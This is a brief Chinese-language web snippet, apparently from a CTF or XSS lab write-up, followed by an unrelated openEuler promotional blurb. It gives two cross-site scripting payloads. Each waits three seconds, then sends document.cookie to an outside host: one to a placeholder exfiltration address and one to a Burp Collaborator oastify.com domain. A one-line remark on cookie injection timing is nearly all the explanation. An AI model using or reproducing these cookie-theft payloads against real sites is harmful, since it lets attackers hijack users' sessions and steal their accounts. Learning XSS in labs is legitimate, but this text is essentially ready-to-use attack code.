方法一:webhook

<script> setTimeout(() => { const img = new Image(); img.src = '这里输入你的外带平地址?cookie=' + encodeURIComponent(document.cookie); }, 3000); </script>

第一条HTTP的cookie是空的,第二条就会有cookie信息,因为服务器是每30秒注入一次

方法二:burp的collaborator模板

<script> setTimeout(() => { const img = new Image(); img.src = 'https://irdlexk0lpricyqb32zl2h1bsc83eu2lx9m.oastify.com?cookie=' + encodeURIComponent(document.cookie); }, 3000); </script>

Logo

openEuler 是由开放原子开源基金会孵化的全场景开源操作系统项目,面向数字基础设施四大核心场景(服务器、云计算、边缘计算、嵌入式),全面支持 ARM、x86、RISC-V、loongArch、PowerPC、SW-64 等多样性计算架构

更多推荐